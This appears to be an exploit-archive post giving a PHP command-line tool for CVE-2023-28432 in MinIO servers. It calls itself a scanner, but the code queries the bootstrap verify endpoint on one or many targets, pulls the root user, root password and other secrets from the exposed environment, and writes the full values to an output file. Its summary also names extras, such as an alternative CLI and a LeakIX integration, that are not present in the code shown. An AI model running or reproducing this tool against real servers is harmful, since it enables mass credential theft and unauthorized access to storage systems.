MinIO RELEASE.2023-03-20T20-16-18Z Vulnerability Scanner
=============================================================================================================================================
| # Title MinIO RELEASE.2023-03-20T20-16-18Z Vulnerability Scanner
=============================================================================================================================================
| # Title : MinIO RELEASE.2023-03-20T20-16-18Z Vulnerability Scanner |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://www.min.io/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/213673/ & CVE-2023-28432
[+] Summary : This PHP script is a command-line vulnerability scanner designed to detect CVE-2023-28432 in MinIO servers.
The vulnerability allows unauthenticated access to sensitive environment variables through the /minio/bootstrap/v1/verify endpoint.
[+] The tool supports:
Scanning a single URL or multiple URLs from a file.
Optional verbose mode with proof-of-concept style output.
Detection and reporting of sensitive MinIO configuration keys (credentials, secrets, URLs).
Result export to an output file.
A placeholder for LeakIX integration to discover exposed MinIO instances.
Colored CLI output and progress tracking for mass scans.
It uses cURL for HTTP requests, validates JSON responses, checks for the presence of the MinioEnv object, and flags targets as vulnerable when sensitive environment data is exposed.
An alternative lightweight standalone CLI implementation and a commented Composer-based advanced structure are also included.
[+] PoC : php poc.php -u https://target:9000 -v
-f targets.txt -o result.txt
<?php
class MinioCVE202328432Scanner {
private $leakixApiKey = "";
private $timeout = 5;
private $fixedRelease = "RELEASE.2023-03-20T20-16-18Z";
private $sensitiveKeys = [
"MINIO_ROOT_USER",
"MINIO_ROOT_PASSWORD",
"MINIO_SECRET_KEY_FILE",
"MINIO_ACCESS_KEY_FILE",
"MINIO_SERVER_URL",
"MINIO_IDENTITY_OPENID_CLIENT_SECRET"
];
private $headers = [
"User-Agent: Mozilla/5.0",
"Accept: application/json"
];
public function __construct() {
stream_context_set_default([
'ssl' => [
'verify_peer' => false,
'verify_peer_name' => false,
],
]);
}
private function detectVersionFromHeaders($headers) {
foreach ($headers as $header) {
if (stripos($header, 'minio') !== false) {
if (preg_match('/RELEASE\.[0-9TZ\-]+/', $header, $m)) {
return $m[0];
}
}
}
return "Unknown";
}
private function isVulnerableVersion($version) {
if ($version === "Unknown") return true;
return strcmp($version, $this->fixedRelease) < 0;
}
public function fetchData($baseUrl, $verbose = true, $outputFile = null) {
$endpoint = rtrim($baseUrl, '/') . '/minio/bootstrap/v1/verify';
if ($verbose) {
$this->printMessage("[*] Target: $endpoint", "blue");
}
$ch = curl_init($endpoint);
curl_setopt_array($ch, [
CURLOPT_RETURNTRANSFER => true,
CURLOPT_POST => true,
CURLOPT_HTTPHEADER => $this->headers,
CURLOPT_TIMEOUT => $this->timeout,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false,
CURLOPT_HEADER => true
]);
$response = curl_exec($ch);
if ($response === false) {
$this->printMessage("Connection error", "red");
curl_close($ch);
return;
}
$headerSize = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
$rawHeaders = substr($response, 0, $headerSize);
$body = substr($response, $headerSize);
curl_close($ch);
$headers = explode("\r\n", $rawHeaders);
$version = $this->detectVersionFromHeaders($headers);
$this->printMessage("Detected Version: $version", "yellow");
if (!$this->isVulnerableVersion($version)) {
$this->printMessage("Target is NOT vulnerable (patched)", "green");
return;
}
$data = json_decode($body, true);
if (!is_array($data) || !isset($data['MinioEnv'])) {
$this->printMessage("No MinioEnv found", "green");
return;
}
$this->printMessage("[VULNERABLE] $baseUrl", "red");
$found = [];
foreach ($this->sensitiveKeys as $key) {
if (isset($data['MinioEnv'][$key])) {
$val = $data['MinioEnv'][$key];
$found[$key] = $val;
if ($verbose) {
$this->printMessage("Key: $key", "red");
$this->printMessage("Value: " . substr($val, 0, 5) . "*****", "white");
}
}
}
if ($outputFile && !empty($found)) {
$line = $baseUrl . " | Version=" . $version;
foreach ($found as $k => $v) {
$line .= " | $k=$v";
}
file_put_contents($outputFile, $line . PHP_EOL, FILE_APPEND);
}
}
public function massUrls($urls, $verbose = false, $outputFile = null) {
$total = count($urls);
$i = 0;
foreach ($urls as $url) {
$i++;
$this->fetchData(trim($url), $verbose, $outputFile);
$this->printProgress("Scanning", $i, $total);
}
}
public function main() {
global $argv;
$opts = getopt("u:f:o:v");
if (isset($opts['u'])) {
$this->fetchData($opts['u'], isset($opts['v']), $opts['o'] ?? null);
return;
}
if (isset($opts['f']) && file_exists($opts['f'])) {
$urls = file($opts['f'], FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
$this->massUrls($urls, isset($opts['v']), $opts['o'] ?? null);
return;
}
$this->printMessage("Usage:", "yellow");
echo "php minio_scanner.php -u <url> [-v]\n";
echo "php minio_scanner.php -f <file> [-o output.txt]\n";
}
private function printMessage($msg, $color = "white") {
$c = [
'red' => "\033[31m",
'green' => "\033[32m",
'yellow' => "\033[33m",
'blue' => "\033[34m",
'white' => "\033[37m",
'reset' => "\033[0m"
];
echo ($c[$color] ?? $c['white']) . $msg . $c['reset'] . PHP_EOL;
}
private function printProgress($title, $current, $total) {
$percent = round(($current / $total) * 100);
echo "\r$title: $percent% ($current/$total)";
if ($current === $total) echo PHP_EOL;
}
}
if (php_sapi_name() === 'cli') {
$scanner = new MinioCVE202328432Scanner();
$scanner->main();
}
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================